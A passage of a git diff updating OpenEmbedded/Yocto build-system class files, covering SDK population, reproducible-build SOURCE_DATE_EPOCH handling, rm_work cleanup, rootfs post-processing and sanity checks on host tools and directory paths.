+ for var in variables:
+ if d.getVar(var, False):
+ d.setVarFlag(var, 'func', '1')
+}
+
do_populate_sdk[file-checksums] += "${TOOLCHAIN_SHAR_REL_TMPL}:True \
${TOOLCHAIN_SHAR_EXT_TMPL}:True"
diff --git a/meta/classes/populate_sdk_ext.bbclass b/meta/classes/populate_sdk_ext.bbclass
index 71686bc993..1bdfd92847 100644
--- a/meta/classes/populate_sdk_ext.bbclass
+++ b/meta/classes/populate_sdk_ext.bbclass
@@ -117,7 +117,7 @@ python write_host_sdk_ext_manifest () {
f.write("%s %s %s\n" % (info[1], info[2], info[3]))
}
-SDK_POSTPROCESS_COMMAND_append_task-populate-sdk-ext = "write_target_sdk_ext_manifest; write_host_sdk_ext_manifest; "
+SDK_POSTPROCESS_COMMAND_append_task-populate-sdk-ext = " write_target_sdk_ext_manifest; write_host_sdk_ext_manifest; "
SDK_TITLE_task-populate-sdk-ext = "${@d.getVar('DISTRO_NAME') or d.getVar('DISTRO')} Extensible SDK"
@@ -247,7 +247,9 @@ python copy_buildsystem () {
# Create a layer for new recipes / appends
bbpath = d.getVar('BBPATH')
- bb.process.run(['devtool', '--bbpath', bbpath, '--basepath', baseoutpath, 'create-workspace', '--create-only', os.path.join(baseoutpath, 'workspace')])
+ env = os.environ.copy()
+ env['PYTHONDONTWRITEBYTECODE'] = '1'
+ bb.process.run(['devtool', '--bbpath', bbpath, '--basepath', baseoutpath, 'create-workspace', '--create-only', os.path.join(baseoutpath, 'workspace')], env=env)
# Create bblayers.conf
bb.utils.mkdirhier(baseoutpath + '/conf')
@@ -360,6 +362,10 @@ python copy_buildsystem () {
# Hide the config information from bitbake output (since it's fixed within the SDK)
f.write('BUILDCFG_HEADER = ""\n\n')
+ # Write METADATA_REVISION
+ # Needs distro override so it can override the value set in the bbclass code (later than local.conf)
+ f.write('METADATA_REVISION:%s = "%s"\n\n' % (d.getVar('DISTRO'), d.getVar('METADATA_REVISION')))
+
f.write('# Provide a flag to indicate we are in the EXT_SDK Context\n')
f.write('WITHIN_EXT_SDK = "1"\n\n')
@@ -664,7 +670,7 @@ sdk_ext_postinst() {
# A bit of another hack, but we need this in the path only for devtool
# so put it at the end of $PATH.
- echo "export PATH=$target_sdk_dir/sysroots/${SDK_SYS}${bindir_nativesdk}:\$PATH" >> $env_setup_script
+ echo "export PATH=\"$target_sdk_dir/sysroots/${SDK_SYS}${bindir_nativesdk}:\$PATH\"" >> $env_setup_script
echo "printf 'SDK environment now set up; additionally you may now run devtool to perform development tasks.\nRun devtool --help for further details.\n'" >> $env_setup_script
diff --git a/meta/classes/pypi.bbclass b/meta/classes/pypi.bbclass
index 87b4c85fc0..c68367449a 100644
--- a/meta/classes/pypi.bbclass
+++ b/meta/classes/pypi.bbclass
@@ -24,3 +24,5 @@ S = "${WORKDIR}/${PYPI_PACKAGE}-${PV}"
UPSTREAM_CHECK_URI ?= "https://pypi.org/project/${PYPI_PACKAGE}/"
UPSTREAM_CHECK_REGEX ?= "/${PYPI_PACKAGE}/(?P<pver>(\d+[\.\-_]*)+)/"
+
+CVE_PRODUCT ?= "python:${PYPI_PACKAGE}"
diff --git a/meta/classes/python3native.bbclass b/meta/classes/python3native.bbclass
index d98fb4c758..2e3a88c126 100644
--- a/meta/classes/python3native.bbclass
+++ b/meta/classes/python3native.bbclass
@@ -17,8 +17,6 @@ export STAGING_LIBDIR
export PYTHON_LIBRARY="${STAGING_LIBDIR}/lib${PYTHON_DIR}${PYTHON_ABI}.so"
export PYTHON_INCLUDE_DIR="${STAGING_INCDIR}/${PYTHON_DIR}${PYTHON_ABI}"
-export _PYTHON_SYSCONFIGDATA_NAME="_sysconfigdata"
-
# suppress host user's site-packages dirs.
export PYTHONNOUSERSITE = "1"
diff --git a/meta/classes/python3targetconfig.bbclass b/meta/classes/python3targetconfig.bbclass
new file mode 100644
index 0000000000..a6e67f1bf8
--- /dev/null
+++ b/meta/classes/python3targetconfig.bbclass
@@ -0,0 +1,29 @@
+inherit python3native
+
+EXTRA_PYTHON_DEPENDS ?= ""
+EXTRA_PYTHON_DEPENDS_class-target = "python3"
+DEPENDS_append = " ${EXTRA_PYTHON_DEPENDS}"
+
+do_configure_prepend_class-target() {
+ export _PYTHON_SYSCONFIGDATA_NAME="_sysconfigdata"
+}
+
+do_compile_prepend_class-target() {
+ export _PYTHON_SYSCONFIGDATA_NAME="_sysconfigdata"
+}
+
+do_install_prepend_class-target() {
+ export _PYTHON_SYSCONFIGDATA_NAME="_sysconfigdata"
+}
+
+do_configure:prepend:class-nativesdk() {
+ export _PYTHON_SYSCONFIGDATA_NAME="_sysconfigdata"
+}
+
+do_compile:prepend:class-nativesdk() {
+ export _PYTHON_SYSCONFIGDATA_NAME="_sysconfigdata"
+}
+
+do_install:prepend:class-nativesdk() {
+ export _PYTHON_SYSCONFIGDATA_NAME="_sysconfigdata"
+}
diff --git a/meta/classes/qemuboot.bbclass b/meta/classes/qemuboot.bbclass
index 648af09b6e..92ae69d9f2 100644
--- a/meta/classes/qemuboot.bbclass
+++ b/meta/classes/qemuboot.bbclass
@@ -7,6 +7,7 @@
# QB_OPT_APPEND: options to append to qemu, e.g., "-show-cursor"
#
# QB_DEFAULT_KERNEL: default kernel to boot, e.g., "bzImage"
+# e.g., "bzImage-initramfs-qemux86-64.bin" if INITRAMFS_IMAGE_BUNDLE is set to 1.
#
# QB_DEFAULT_FSTYPE: default FSTYPE to boot, e.g., "ext4"
#
@@ -75,7 +76,7 @@
QB_MEM ?= "-m 256"
QB_SERIAL_OPT ?= "-serial mon:stdio -serial null"
-QB_DEFAULT_KERNEL ?= "${KERNEL_IMAGETYPE}"
+QB_DEFAULT_KERNEL ?= "${@bb.utils.contains("INITRAMFS_IMAGE_BUNDLE", "1", "${KERNEL_IMAGETYPE}-${INITRAMFS_LINK_NAME}.bin", "${KERNEL_IMAGETYPE}", d)}"
QB_DEFAULT_FSTYPE ?= "ext4"
QB_OPT_APPEND ?= "-show-cursor"
QB_NETWORK_DEVICE ?= "-device virtio-net-pci,netdev=net0,mac=@MAC@"
diff --git a/meta/classes/report-error.bbclass b/meta/classes/report-error.bbclass
index 1a12db1206..de48e4ff0f 100644
--- a/meta/classes/report-error.bbclass
+++ b/meta/classes/report-error.bbclass
@@ -64,6 +64,8 @@ python errorreport_handler () {
data['failures'] = []
data['component'] = " ".join(e.getPkgs())
data['branch_commit'] = str(base_detect_branch(e.data)) + ": " + str(base_detect_revision(e.data))
+ data['bitbake_version'] = e.data.getVar("BB_VERSION")
+ data['layer_version'] = get_layers_branch_rev(e.data)
data['local_conf'] = get_conf_data(e, 'local.conf')
data['auto_conf'] = get_conf_data(e, 'auto.conf')
lock = bb.utils.lockfile(datafile + '.lock')
diff --git a/meta/classes/reproducible_build.bbclass b/meta/classes/reproducible_build.bbclass
index 2f3bd90b07..3c01dbd5b3 100644
--- a/meta/classes/reproducible_build.bbclass
+++ b/meta/classes/reproducible_build.bbclass
@@ -1,17 +1,38 @@
# reproducible_build.bbclass
#
-# Sets SOURCE_DATE_EPOCH in each component's build environment.
+# Sets the default SOURCE_DATE_EPOCH in each component's build environment.
+# The format is number of seconds since the system epoch.
+#
# Upstream components (generally) respect this environment variable,
# using it in place of the "current" date and time.
# See https://reproducible-builds.org/specs/source-date-epoch/
#
-# After sources are unpacked but before they are patched, we set a reproducible value for SOURCE_DATE_EPOCH.
-# This value should be reproducible for anyone who builds the same revision from the same sources.
+# The default value of SOURCE_DATE_EPOCH comes from the function
+# get_source_date_epoch_value which reads from the SDE_FILE, or if the file
+# is not available (or set to 0) will use the fallback of
+# SOURCE_DATE_EPOCH_FALLBACK.
+#
+# The SDE_FILE is normally constructed from the function
+# create_source_date_epoch_stamp which is typically added as a postfuncs to
+# the do_unpack task. If a recipe does NOT have do_unpack, it should be added
+# to a task that runs after the source is available and before the
+# do_deploy_source_date_epoch task is executed.
+#
+# If a recipe wishes to override the default behavior it should set it's own
+# SOURCE_DATE_EPOCH or override the do_deploy_source_date_epoch_stamp task
+# with recipe-specific functionality to write the appropriate
+# SOURCE_DATE_EPOCH into the SDE_FILE.
+#
+# SOURCE_DATE_EPOCH is intended to be a reproducible value. This value should
+# be reproducible for anyone who builds the same revision from the same
+# sources.
#
-# There are 4 ways we determine SOURCE_DATE_EPOCH:
+# There are 4 ways the create_source_date_epoch_stamp function determines what
+# becomes SOURCE_DATE_EPOCH:
#
# 1. Use the value from __source_date_epoch.txt file if this file exists.
-# This file was most likely created in the previous build by one of the following methods 2,3,4.
+# This file was most likely created in the previous build by one of the
+# following methods 2,3,4.
# Alternatively, it can be provided by a recipe via SRC_URI.
#
# If the file does not exist:
@@ -22,25 +43,24 @@
# 3. Use the mtime of "known" files such as NEWS, CHANGLELOG, ...
# This works for well-kept repositories distributed via tarball.
#
-# 4. Use the modification time of the youngest file in the source tree, if there is one.
+# 4. Use the modification time of the youngest file in the source tree, if
+# there is one.
# This will be the newest file from the distribution tarball, if any.
#
-# 5. Fall back to a fixed timestamp.
+# 5. Fall back to a fixed timestamp (SOURCE_DATE_EPOCH_FALLBACK).
#
-# Once the value of SOURCE_DATE_EPOCH is determined, it is stored in the recipe's SDE_FILE.
-# If none of these mechanisms are suitable, replace the do_deploy_source_date_epoch task
-# with recipe-specific functionality to write the appropriate SOURCE_DATE_EPOCH into the SDE_FILE.
-#
-# If this file is found by other tasks, the value is exported in the SOURCE_DATE_EPOCH variable.
-# SOURCE_DATE_EPOCH is set for all tasks that might use it (do_configure, do_compile, do_package, ...)
+# Once the value is determined, it is stored in the recipe's SDE_FILE.
BUILD_REPRODUCIBLE_BINARIES ??= '1'
-inherit ${@oe.utils.ifelse(d.getVar('BUILD_REPRODUCIBLE_BINARIES') == '1', 'reproducible_build_simple', '')}
+inherit reproducible_build_simple
-SDE_DIR ="${WORKDIR}/source-date-epoch"
+SDE_DIR = "${WORKDIR}/source-date-epoch"
SDE_FILE = "${SDE_DIR}/__source_date_epoch.txt"
SDE_DEPLOYDIR = "${WORKDIR}/deploy-source-date-epoch"
+# A SOURCE_DATE_EPOCH of '0' might be misinterpreted as no SDE
+export SOURCE_DATE_EPOCH_FALLBACK ??= "1302044400"
+
SSTATETASKS += "do_deploy_source_date_epoch"
do_deploy_source_date_epoch () {
@@ -74,45 +94,47 @@ python create_source_date_epoch_stamp() {
import oe.reproducible
epochfile = d.getVar('SDE_FILE')
- # If it exists we need to regenerate as the sources may have changed
- if os.path.isfile(epochfile):
- bb.debug(1, "Deleting existing SOURCE_DATE_EPOCH from: %s" % epochfile)
- os.remove(epochfile)
+ tmp_file = "%s.new" % epochfile
source_date_epoch = oe.reproducible.get_source_date_epoch(d, d.getVar('S'))
bb.debug(1, "SOURCE_DATE_EPOCH: %d" % source_date_epoch)
bb.utils.mkdirhier(d.getVar('SDE_DIR'))
- with open(epochfile, 'w') as f:
+ with open(tmp_file, 'w') as f:
f.write(str(source_date_epoch))
+
+ os.rename(tmp_file, epochfile)
}
+EPOCHTASK = "do_deploy_source_date_epoch"
+
+# Generate the stamp after do_unpack runs
+do_unpack[postfuncs] += "create_source_date_epoch_stamp"
+
def get_source_date_epoch_value(d):
- cached = d.getVar('__CACHED_SOURCE_DATE_EPOCH')
- if cached:
+ epochfile = d.getVar('SDE_FILE')
+ cached, efile = d.getVar('__CACHED_SOURCE_DATE_EPOCH') or (None, None)
+ if cached and efile == epochfile:
return cached
- epochfile = d.getVar('SDE_FILE')
- source_date_epoch = 0
- if os.path.isfile(epochfile):
+ if cached and epochfile != efile:
+ bb.debug(1, "Epoch file changed from %s to %s" % (efile, epochfile))
+
+ source_date_epoch = int(d.getVar('SOURCE_DATE_EPOCH_FALLBACK'))
+ try:
with open(epochfile, 'r') as f:
s = f.read()
try:
source_date_epoch = int(s)
except ValueError:
- bb.warn("SOURCE_DATE_EPOCH value '%s' is invalid. Reverting to 0" % s)
- source_date_epoch = 0
+ bb.warn("SOURCE_DATE_EPOCH value '%s' is invalid. Reverting to SOURCE_DATE_EPOCH_FALLBACK" % s)
+ source_date_epoch = int(d.getVar('SOURCE_DATE_EPOCH_FALLBACK'))
bb.debug(1, "SOURCE_DATE_EPOCH: %d" % source_date_epoch)
- else:
+ except FileNotFoundError:
bb.debug(1, "Cannot find %s. SOURCE_DATE_EPOCH will default to %d" % (epochfile, source_date_epoch))
- d.setVar('__CACHED_SOURCE_DATE_EPOCH', str(source_date_epoch))
+ d.setVar('__CACHED_SOURCE_DATE_EPOCH', (str(source_date_epoch), epochfile))
return str(source_date_epoch)
export SOURCE_DATE_EPOCH ?= "${@get_source_date_epoch_value(d)}"
BB_HASHBASE_WHITELIST += "SOURCE_DATE_EPOCH"
-
-python () {
- if d.getVar('BUILD_REPRODUCIBLE_BINARIES') == '1':
- d.appendVarFlag("do_unpack", "postfuncs", " create_source_date_epoch_stamp")
-}
diff --git a/meta/classes/rm_work.bbclass b/meta/classes/rm_work.bbclass
index 01c2ab1c78..24051aa378 100644
--- a/meta/classes/rm_work.bbclass
+++ b/meta/classes/rm_work.bbclass
@@ -27,6 +27,13 @@ BB_SCHEDULER ?= "completion"
BB_TASK_IONICE_LEVEL_task-rm_work = "3.0"
do_rm_work () {
+ # Force using the HOSTTOOLS 'rm' - otherwise the SYSROOT_NATIVE 'rm' can be selected depending on PATH
+ # Avoids race-condition accessing 'rm' when deleting WORKDIR folders at the end of this function
+ RM_BIN="$(PATH=${HOSTTOOLS_DIR} command -v rm)"
+ if [ -z "${RM_BIN}" ]; then
+ bbfatal "Binary 'rm' not found in HOSTTOOLS_DIR, cannot remove WORKDIR data."
+ fi
+
# If the recipe name is in the RM_WORK_EXCLUDE, skip the recipe.
for p in ${RM_WORK_EXCLUDE}; do
if [ "$p" = "${PN}" ]; then
@@ -73,7 +80,7 @@ do_rm_work () {
# sstate version since otherwise we'd need to leave 'plaindirs' around
# such as 'packages' and 'packages-split' and these can be large. No end
# of chain tasks depend directly on do_package anymore.
- rm -f $i;
+ "${RM_BIN}" -f -- $i;
;;
*_setscene*)
# Skip stamps which are already setscene versions
@@ -90,7 +97,7 @@ do_rm_work () {
;;
esac
done
- rm -f $i
+ "${RM_BIN}" -f -- $i
esac
done
@@ -100,9 +107,9 @@ do_rm_work () {
# Retain only logs and other files in temp, safely ignore
# failures of removing pseudo folers on NFS2/3 server.
if [ $dir = 'pseudo' ]; then
- rm -rf $dir 2> /dev/null || true
+ "${RM_BIN}" -rf -- $dir 2> /dev/null || true
elif ! echo "$excludes" | grep -q -w "$dir"; then
- rm -rf $dir
+ "${RM_BIN}" -rf -- $dir
fi
done
}
diff --git a/meta/classes/rootfs-postcommands.bbclass b/meta/classes/rootfs-postcommands.bbclass
index c43b9a9823..943534c57a 100644
--- a/meta/classes/rootfs-postcommands.bbclass
+++ b/meta/classes/rootfs-postcommands.bbclass
@@ -1,6 +1,6 @@
# Zap the root password if debug-tweaks feature is not enabled
-ROOTFS_POSTPROCESS_COMMAND += '${@bb.utils.contains_any("IMAGE_FEATURES", [ 'debug-tweaks', 'empty-root-password' ], "", "zap_empty_root_password ; ",d)}'
+ROOTFS_POSTPROCESS_COMMAND += '${@bb.utils.contains_any("IMAGE_FEATURES", [ 'debug-tweaks', 'empty-root-password' ], "", "zap_empty_root_password; ",d)}'
# Allow dropbear/openssh to accept logins from accounts with an empty password string if debug-tweaks or allow-empty-password is enabled
ROOTFS_POSTPROCESS_COMMAND += '${@bb.utils.contains_any("IMAGE_FEATURES", [ 'debug-tweaks', 'allow-empty-password' ], "ssh_allow_empty_password; ", "",d)}'
@@ -12,7 +12,7 @@ ROOTFS_POSTPROCESS_COMMAND += '${@bb.utils.contains_any("IMAGE_FEATURES", [ 'deb
ROOTFS_POSTPROCESS_COMMAND += '${@bb.utils.contains_any("IMAGE_FEATURES", [ 'debug-tweaks', 'post-install-logging' ], "postinst_enable_logging; ", "",d)}'
# Create /etc/timestamp during image construction to give a reasonably sane default time setting
-ROOTFS_POSTPROCESS_COMMAND += "rootfs_update_timestamp ; "
+ROOTFS_POSTPROCESS_COMMAND += "rootfs_update_timestamp; "
# Tweak the mount options for rootfs in /etc/fstab if read-only-rootfs is enabled
ROOTFS_POSTPROCESS_COMMAND += '${@bb.utils.contains("IMAGE_FEATURES", "read-only-rootfs", "read_only_rootfs_hook; ", "",d)}'
@@ -26,7 +26,7 @@ ROOTFS_POSTPROCESS_COMMAND += '${@bb.utils.contains("IMAGE_FEATURES", "read-only
APPEND_append = '${@bb.utils.contains("IMAGE_FEATURES", "read-only-rootfs", " ro", "", d)}'
# Generates test data file with data store variables expanded in json format
-ROOTFS_POSTPROCESS_COMMAND += "write_image_test_data ; "
+ROOTFS_POSTPROCESS_COMMAND += "write_image_test_data; "
# Write manifest
IMAGE_MANIFEST = "${IMGDEPLOYDIR}/${IMAGE_NAME}${IMAGE_NAME_SUFFIX}.manifest"
@@ -267,9 +267,10 @@ python write_image_manifest () {
if os.path.exists(manifest_name) and link_name:
manifest_link = deploy_dir + "/" + link_name + ".manifest"
- if os.path.lexists(manifest_link):
- os.remove(manifest_link)
- os.symlink(os.path.basename(manifest_name), manifest_link)
+ if manifest_link != manifest_name:
+ if os.path.lexists(manifest_link):
+ os.remove(manifest_link)
+ os.symlink(os.path.basename(manifest_name), manifest_link)
}
# Can be used to create /etc/timestamp during image construction to give a reasonably
@@ -304,7 +305,7 @@ rootfs_trim_schemas () {
}
rootfs_check_host_user_contaminated () {
- contaminated="${WORKDIR}/host-user-contaminated.txt"
+ contaminated="${S}/host-user-contaminated.txt"
HOST_USER_UID="$(PSEUDO_UNLOAD=1 id -u)"
HOST_USER_GID="$(PSEUDO_UNLOAD=1 id -g)"
@@ -339,9 +340,10 @@ python write_image_test_data() {
if os.path.exists(testdata_name) and link_name:
testdata_link = os.path.join(deploy_dir, "%s.testdata.json" % link_name)
- if os.path.lexists(testdata_link):
- os.remove(testdata_link)
- os.symlink(os.path.basename(testdata_name), testdata_link)
+ if testdata_link != testdata_name:
+ if os.path.lexists(testdata_link):
+ os.remove(testdata_link)
+ os.symlink(os.path.basename(testdata_name), testdata_link)
}
write_image_test_data[vardepsexclude] += "TOPDIR"
diff --git a/meta/classes/rootfs_deb.bbclass b/meta/classes/rootfs_deb.bbclass
index 2b93796a76..ef616da229 100644
--- a/meta/classes/rootfs_deb.bbclass
+++ b/meta/classes/rootfs_deb.bbclass
@@ -7,7 +7,7 @@ ROOTFS_PKGMANAGE = "dpkg apt"
do_rootfs[depends] += "dpkg-native:do_populate_sysroot apt-native:do_populate_sysroot"
do_populate_sdk[depends] += "dpkg-native:do_populate_sysroot apt-native:do_populate_sysroot bzip2-native:do_populate_sysroot"
do_rootfs[recrdeptask] += "do_package_write_deb do_package_qa"
-do_rootfs[vardeps] += "PACKAGE_FEED_URIS"
+do_rootfs[vardeps] += "PACKAGE_FEED_URIS PACKAGE_FEED_BASE_PATHS PACKAGE_FEED_ARCHS"
do_rootfs[lockfiles] += "${DEPLOY_DIR_DEB}/deb.lock"
do_populate_sdk[lockfiles] += "${DEPLOY_DIR_DEB}/deb.lock"
diff --git a/meta/classes/rootfs_ipk.bbclass b/meta/classes/rootfs_ipk.bbclass
index e73d2bfdae..f1e0219732 100644
--- a/meta/classes/rootfs_ipk.bbclass
+++ b/meta/classes/rootfs_ipk.bbclass
@@ -11,7 +11,7 @@ ROOTFS_PKGMANAGE = "opkg ${EXTRAOPKGCONFIG}"
do_rootfs[depends] += "opkg-native:do_populate_sysroot opkg-utils-native:do_populate_sysroot"
do_populate_sdk[depends] += "opkg-native:do_populate_sysroot opkg-utils-native:do_populate_sysroot"
do_rootfs[recrdeptask] += "do_package_write_ipk do_package_qa"
-do_rootfs[vardeps] += "PACKAGE_FEED_URIS"
+do_rootfs[vardeps] += "PACKAGE_FEED_URIS PACKAGE_FEED_BASE_PATHS PACKAGE_FEED_ARCHS"
do_rootfs[lockfiles] += "${WORKDIR}/ipk.lock"
do_populate_sdk[lockfiles] += "${WORKDIR}/ipk.lock"
diff --git a/meta/classes/rootfs_rpm.bbclass b/meta/classes/rootfs_rpm.bbclass
index 51f89ea990..ae0f541c49 100644
--- a/meta/classes/rootfs_rpm.bbclass
+++ b/meta/classes/rootfs_rpm.bbclass
@@ -24,7 +24,7 @@ do_rootfs[depends] += "${RPMROOTFSDEPENDS}"
do_populate_sdk[depends] += "${RPMROOTFSDEPENDS}"
do_rootfs[recrdeptask] += "do_package_write_rpm do_package_qa"
-do_rootfs[vardeps] += "PACKAGE_FEED_URIS"
+do_rootfs[vardeps] += "PACKAGE_FEED_URIS PACKAGE_FEED_BASE_PATHS PACKAGE_FEED_ARCHS"
python () {
if d.getVar('BUILD_IMAGES_FROM_FEEDS'):
diff --git a/meta/classes/rootfsdebugfiles.bbclass b/meta/classes/rootfsdebugfiles.bbclass
index e2ba4e3647..85c7ec7434 100644
--- a/meta/classes/rootfsdebugfiles.bbclass
+++ b/meta/classes/rootfsdebugfiles.bbclass
@@ -28,7 +28,7 @@
ROOTFS_DEBUG_FILES ?= ""
ROOTFS_DEBUG_FILES[doc] = "Lists additional files or directories to be installed with 'cp -a' in the format 'source1 target1;source2 target2;...'"
-ROOTFS_POSTPROCESS_COMMAND += "rootfs_debug_files ;"
+ROOTFS_POSTPROCESS_COMMAND += "rootfs_debug_files;"
rootfs_debug_files () {
#!/bin/sh -e
echo "${ROOTFS_DEBUG_FILES}" | sed -e 's/;/\n/g' | while read source target mode; do
diff --git a/meta/classes/sanity.bbclass b/meta/classes/sanity.bbclass
index 1486cce357..33e5e5952f 100644
--- a/meta/classes/sanity.bbclass
+++ b/meta/classes/sanity.bbclass
@@ -392,9 +392,12 @@ def check_connectivity(d):
msg = data.getVar('CONNECTIVITY_CHECK_MSG') or ""
if len(msg) == 0:
msg = "%s.\n" % err
- msg += " Please ensure your host's network is configured correctly,\n"
- msg += " or set BB_NO_NETWORK = \"1\" to disable network access if\n"
- msg += " all required sources are on local disk.\n"
+ msg += " Please ensure your host's network is configured correctly.\n"
+ msg += " If your ISP or network is blocking the above URL,\n"
+ msg += " try with another domain name, for example by setting:\n"
+ msg += " CONNECTIVITY_CHECK_URIS = \"https://www.example.com/\""
+ msg += " You could also set BB_NO_NETWORK = \"1\" to disable network\n"
+ msg += " access if all required sources are on local disk.\n"
retval = msg
return retval
@@ -558,6 +561,14 @@ def check_tar_version(sanity_data):
version = result.split()[3]
if LooseVersion(version) < LooseVersion("1.28"):
return "Your version of tar is older than 1.28 and does not have the support needed to enable reproducible builds. Please install a newer version of tar (you could use the project's buildtools-tarball from our last release or use scripts/install-buildtools).\n"
+
+ try:
+ result = subprocess.check_output(["tar", "--help"], stderr=subprocess.STDOUT).decode('utf-8')
+ if "--xattrs" not in result:
+ return "Your tar doesn't support --xattrs, please use GNU tar.\n"
+ except subprocess.CalledProcessError as e:
+ return "Unable to execute tar --help, exit code %d\n%s\n" % (e.returncode, e.output)
+
return None
# We use git parameters and functionality only found in 1.7.8 or later
@@ -619,6 +630,9 @@ def sanity_handle_abichanges(status, d):
f.write(current_abi)
elif int(abi) <= 11 and current_abi == "12":
status.addresult("The layout of TMPDIR changed for Recipe Specific Sysroots.\nConversion doesn't make sense and this change will rebuild everything so please delete TMPDIR (%s).\n" % d.getVar("TMPDIR"))
+ elif int(abi) <= 13 and current_abi == "14":
+ status.addresult("TMPDIR changed to include path filtering from the pseudo database.\nIt is recommended to use a clean TMPDIR with the new pseudo path filtering so TMPDIR (%s) would need to be removed to continue.\n" % d.getVar("TMPDIR"))
+
elif (abi != current_abi):
# Code to convert from one ABI to another could go here if possible.
status.addresult("Error, TMPDIR has changed its layout version number (%s to %s) and you need to either rebuild, revert or adjust it at your own risk.\n" % (abi, current_abi))
@@ -700,6 +714,23 @@ def check_sanity_version_change(status, d):
if (tmpdirmode & stat.S_ISUID):
status.addresult("TMPDIR is setuid, please don't build in a setuid directory")
+ # Check that a user isn't building in a path in PSEUDO_IGNORE_PATHS
+ pseudoignorepaths = d.getVar('PSEUDO_IGNORE_PATHS', expand=True).split(",")
+ workdir = d.getVar('WORKDIR', expand=True)
+ for i in pseudoignorepaths:
+ if i and workdir.startswith(i):
+ status.addresult("You are building in a path included in PSEUDO_IGNORE_PATHS " + str(i) + " please locate the build outside this path.\n")
+
+ # Check if PSEUDO_IGNORE_PATHS and and paths under pseudo control overlap
+ pseudoignorepaths = d.getVar('PSEUDO_IGNORE_PATHS', expand=True).split(",")
+ pseudo_control_dir = "${D},${PKGD},${PKGDEST},${IMAGEROOTFS},${SDK_OUTPUT}"
+ pseudocontroldir = d.expand(pseudo_control_dir).split(",")
+ for i in pseudoignorepaths:
+ for j in pseudocontroldir:
+ if i and j:
+ if j.startswith(i):
+ status.addresult("A path included in PSEUDO_IGNORE_PATHS " + str(i) + " and the path " + str(j) + " overlap and this will break pseudo permission and ownership tracking. Please set the path " + str(j) + " to a different directory which does not overlap with pseudo controlled directories. \n")
+
# Some third-party software apparently relies on chmod etc. being suid root (!!)
import stat
suid_check_bins = "chown chmod mknod".split()
@@ -784,6 +815,11 @@ def check_sanity_everybuild(status, d):
if "." in paths or "./" in paths or "" in paths:
status.addresult("PATH contains '.', './' or '' (empty element), which will break the build, please remove this.\nParsed PATH is " + str(paths) + "\n")
+ #Check if bitbake is present in PATH environment variable
+ bb_check = bb.utils.which(d.getVar('PATH'), 'bitbake')
+ if not bb_check:
+ bb.warn("bitbake binary is not found in PATH, did you source the script?")
+
# Check whether 'inherit' directive is found (used for a class to inherit)
# in conf file it's supposed to be uppercase INHERIT
inherit = d.getVar('inherit')
@@ -857,13 +893,18 @@ def check_sanity_everybuild(status, d):
except:
pass
- oeroot = d.getVar('COREBASE')
- if oeroot.find('+') != -1:
- status.addresult("Error, you have an invalid character (+) in your COREBASE directory path. Please move the installation to a directory which doesn't include any + characters.")
- if oeroot.find('@') != -1:
- status.addresult("Error, you have an invalid character (@) in your COREBASE directory path. Please move the installation to a directory which doesn't include any @ characters.")
- if oeroot.find(' ') != -1:
- status.addresult("Error, you have a space in your COREBASE directory path. Please move the installation to a directory which doesn't include a space since autotools doesn't support this.")
+ for checkdir in ['COREBASE', 'TMPDIR']:
+ val = d.getVar(checkdir)
+ if val.find('..') != -1:
+ status.addresult("Error, you have '..' in your %s directory path. Please ensure the variable contains an absolute path as this can break some recipe builds in obtuse ways." % checkdir)
+ if val.find('+') != -1:
+ status.addresult("Error, you have an invalid character (+) in your %s directory path. Please move the installation to a directory which doesn't include any + characters." % checkdir)
+ if val.find('@') != -1:
+ status.addresult("Error, you have an invalid character (@) in your %s directory path. Please move the installation to a directory which doesn't include any @ characters." % checkdir)
+ if val.find(' ') != -1:
+ status.addresult("Error, you have a space in your %s directory path. Please move the installation to a directory which doesn't include a space since autotools doesn't support this." % checkdir)
+ if val.find('%') != -1:
+ status.addresult("Error, you have an invalid character (%) in your %s directory path which causes problems with python string formatting. Please move the installation to a directory which doesn't include any % characters." % checkdir)
# Check the format of MIRRORS, PREMIRRORS and SSTATE_MIRRORS
import re
diff --git a/meta/classes/scons.bbclass b/meta/classes/scons.bbclass
index 6b171ca8df..4f3ae502ef 100644
--- a/meta/classes/scons.bbclass
+++ b/meta/classes/scons.bbclass
@@ -5,7 +5,6 @@ DEPENDS += "python3-scons-native"
EXTRA_OESCONS ?= ""
do_configure() {
- unset _PYTHON_SYSCONFIGDATA_NAME
if [ -n "${CONFIGURESTAMPFILE}" ]; then
if [ -e "${CONFIGURESTAMPFILE}" -a "`cat ${CONFIGURESTAMPFILE}`" != "${BB_TASKHASH}" -a "${CLEANBROKEN}" != "1" ]; then
${STAGING_BINDIR_NATIVE}/scons --clean PREFIX=${prefix} prefix=${prefix} ${EXTRA_OESCONS}
@@ -17,13 +16,11 @@ do_configure() {
}
scons_do_compile() {
- unset _PYTHON_SYSCONFIGDATA_NAME
${STAGING_BINDIR_NATIVE}/scons ${PARALLEL_MAKE} PREFIX=${prefix} prefix=${prefix} ${EXTRA_OESCONS} || \
die "scons build execution failed."
}
scons_do_install() {
- unset _PYTHON_SYSCONFIGDATA_NAME
${STAGING_BINDIR_NATIVE}/scons install_root=${D}${prefix} PREFIX=${prefix} prefix=${prefix} ${EXTRA_OESCONS} install || \
die "scons install execution failed."
}
diff --git a/meta/classes/sstate.bbclass b/meta/classes/sstate.bbclass
index 66a96a7603..1058778980 100644
--- a/meta/classes/sstate.bbclass
+++ b/meta/classes/sstate.bbclass
@@ -20,7 +20,7 @@ def generate_sstatefn(spec, hash, taskname, siginfo, d):
components = spec.split(":")
# Fields 0,5,6 are mandatory, 1 is most useful, 2,3,4 are just for information
# 7 is for the separators
- avail = (254 - len(hash + "_" + taskname + extension) - len(components[0]) - len(components[1]) - len(components[5]) - len(components[6]) - 7) // 3
+ avail = (limit - len(hash + "_" + taskname + extension) - len(components[0]) - len(components[1]) - len(components[5]) - len(components[6]) - 7) // 3
components[2] = components[2][:avail]
components[3] = components[3][:avail]
components[4] = components[4][:avail]
@@ -72,6 +72,7 @@ BB_HASHFILENAME = "False ${SSTATE_PKGSPEC} ${SSTATE_SWSPEC}"
SSTATE_ARCHS = " \
${BUILD_ARCH} \
+ ${BUILD_ARCH}_${ORIGNATIVELSBSTRING} \
${BUILD_ARCH}_${SDK_ARCH}_${SDK_OS} \
${BUILD_ARCH}_${TARGET_ARCH} \
${SDK_ARCH}_${SDK_OS} \
@@ -80,6 +81,7 @@ SSTATE_ARCHS = " \
${PACKAGE_ARCH} \
${PACKAGE_EXTRA_ARCHS} \
${MACHINE_ARCH}"
+SSTATE_ARCHS[vardepsexclude] = "ORIGNATIVELSBSTRING"
SSTATE_MANMACH ?= "${SSTATE_PKGARCH}"
@@ -315,6 +317,8 @@ def sstate_install(ss, d):
if os.path.exists(i):
with open(i, "r") as f:
